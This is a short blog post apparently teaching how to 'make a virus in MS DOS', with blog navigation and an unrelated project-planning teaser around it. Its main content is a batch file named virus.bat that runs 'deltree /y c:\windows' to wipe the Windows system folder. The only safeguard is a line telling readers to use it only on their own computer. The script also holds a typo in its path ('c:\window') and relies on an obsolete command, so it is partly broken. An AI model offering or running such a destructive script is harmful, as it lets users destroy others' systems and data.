Featured Post

Step Wise Project Planning

Planning is the most difficult process in project management. The framework described is called the Stepwise method to help to distinguis...

  1. Home

how to make virus in MS DOS

how to make virus in Ms dos.

Make a file with virus.bat
***** code start *****

@echo off
cd
cd c:\window
@deltree/y c:\windows
exit

***** end of code *****

This will delete the file windows. ONLY USE THIS CODE TO DELETE WINDOWS ON YOUR OWN COMPUTER!

Previous
Next Post »